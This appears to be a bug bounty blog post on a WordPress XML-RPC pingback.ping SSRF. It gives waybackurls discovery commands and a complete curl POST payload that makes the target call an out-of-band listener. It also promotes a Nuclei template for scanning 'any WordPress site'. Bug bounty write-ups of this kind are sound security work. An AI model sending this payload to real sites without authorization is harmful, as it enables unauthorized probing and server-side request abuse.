$1350 Bounty From a Simple WordPress XML RPC SSRF Bug 😱👨💻 + Free SEVEN X Custom Nuclei Template Gift Inside 🆓
This is a simple but powerful write-up for new bug hunters. Today, I will show how I found a very easy WordPress XML RPC bug that gave me a total Bounty of 1350 USD. 💰 Many websites still have this issue because developers forget to disable old features or do not understand how XML-RPC works at all. Bug hunters learn these things in one day, but some developers still leave the same mistake online for years. 😅🔥
And the best part: you do not need to test everything manually. "SEVEN X" is giving a Free Custom Nuclei Template in this blog, so you can scan any WordPress site with one command and find the same bug in seconds. No hard work, no stress. Just scan, confirm, report, and enjoy the bounty. 🤑💻
What is XML-RPC in WordPress? 🤔
XML RPC is a built-in WordPress feature that lets other apps connect to the site from outside. It is mostly used by mobile apps, Jetpack, and blogging tools to publish or manage posts. The endpoint is normally found at https://pixellabgeeks.com/xmlrpc.php. Many websites keep this feature active even when they do not use it. This can expose powerful functions to anyone on the internet and can create security risks if not protected. 📡🗃️
1️⃣ Finding XML RPC With Waybackurls 🔍
Finding this bug is very easy. I used a simple tool named waybackurls to look for old paths of the website. Many WordPress sites have an xmlrpc.php file.
- Command used:
$ waybackurls pixellabgeeks.com | grep "xmlrpc"
Result:
- https://pixellabgeeks.com/xmlrpc.php
- https://blog.pixellabgeeks.com/xmlrpc.php
.......
👉 This means the XML RPC file is live and reachable. ✅
2️⃣ Checking the Endpoint in Browser 🌐
When I opened the URL in the browser, I saw this error:
XML RPC server accepts POST requests only.
✅ This is important. It tells us that the GET request will fail, but the POST request will work. This helps us move forward with testing. 🔍
3️⃣ Sending the Exploit Request 🚨
Now I sent a POST request to the XML RPC file using the pingback.ping method. This method asks the server to open any URL we give. This is perfect for SSRF testing.
- I used this curl command:
curl -i -s -X POST https://pixellabgeeks.com/xmlrpc.php \-H "Content-Type: text/xml" \-d '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://xyz.oastify.com</string></value></param><param><value><string>https://pixellabgeeks.com/</string></value></param></params></methodCall>'
- ⚠️ You can use your Burp Collaborator link or your own server link instead of xyz.oastify.com. 🛜
.jpg "3️⃣ Sending the Exploit Request 🚨")
✅ If you see a callback or a DNS hit, this means the server made a request to your listener. This confirms SSRF. 🎯
🆗 SSRF Confirmation 🎉💰
After sending the POST request, I got an instant callback from the server. This showed that the website made a request to my listener. This is clear proof that the XML RPC pingback.ping method can be used for SSRF.
👉 Many websites keep this method open even when they do not need it. This makes it a serious security issue. ⚠️
⚠️ WordPress Feature Putting Your Site at Risk 🚨
The XML-RPC feature in WordPress allows remote access for apps like 📱 mobile clients, 🔗 Jetpack, and ✍️ posting tools. Many websites keep it enabled even when they don’t need it, which can expose internal functions to attackers. 🚨 This is exactly how I found a simple SSRF bug, tested it easily, and earned a $1350 USD Bounty. With the "SEVEN X Custom Nuclei Template", you can now scan sites for this bug quickly without manual testing. 🛠️💰
🎉 Final Words 🎁
This is a very simple and powerful bug, and it is easy to find with tools like waybackurls and curl. Many old WordPress sites still have this issue. Most of the time, this bug is marked as P5 informative or low, and sometimes it is accepted as P4. But the final severity always depends on the developer. If the impact is higher, they can even mark it as P2 or P1. 🤑🤗
✅ In my case, one report was accepted as P2 and another as P4, and together they gave me a total of $1350 USD in bounty. 💰👨💻
👉 This is a great bug for beginners because it is easy to test and can still give a good bounty. 😉
🎁 FREE GIFT | CUSTOME NUCLEI TEMPLATE 🤩
You reached the end of this write-up, which means you are a true Bug Hunter. As a reward, here is a special gift for you. 🫡 You can now download the "SEVEN X Custom Nuclei Template for XML RPC SSRF". This template will help you find this bug in just one scan, no manual testing needed. 🤗
In Bug Bounty, Always Keep Updating Yourself and Carry Real Patience Inside. ⏳💰 Those Who Have Patience are the Ones Who earn the Bounty. 🤗👨💻
.jpg "🎁 FREE GIFT | CUSTOME NUCLEI TEMPLATE 🤩"){kind=tracking}
#CyberSecurity #EthicalHacking #BugBounty #CustomNucleiTemplate #WebSecurity #PLG #SEVENxOFFICIAL
WhatsApp Channel
Join Now
Facebook Page
Join Now
Telegram Channel
Join Now
YouTube Channel
Subscribe Now
LinkedIn Account
Connect Now
Online Store
Shop Now
Social Media Links
Visit Now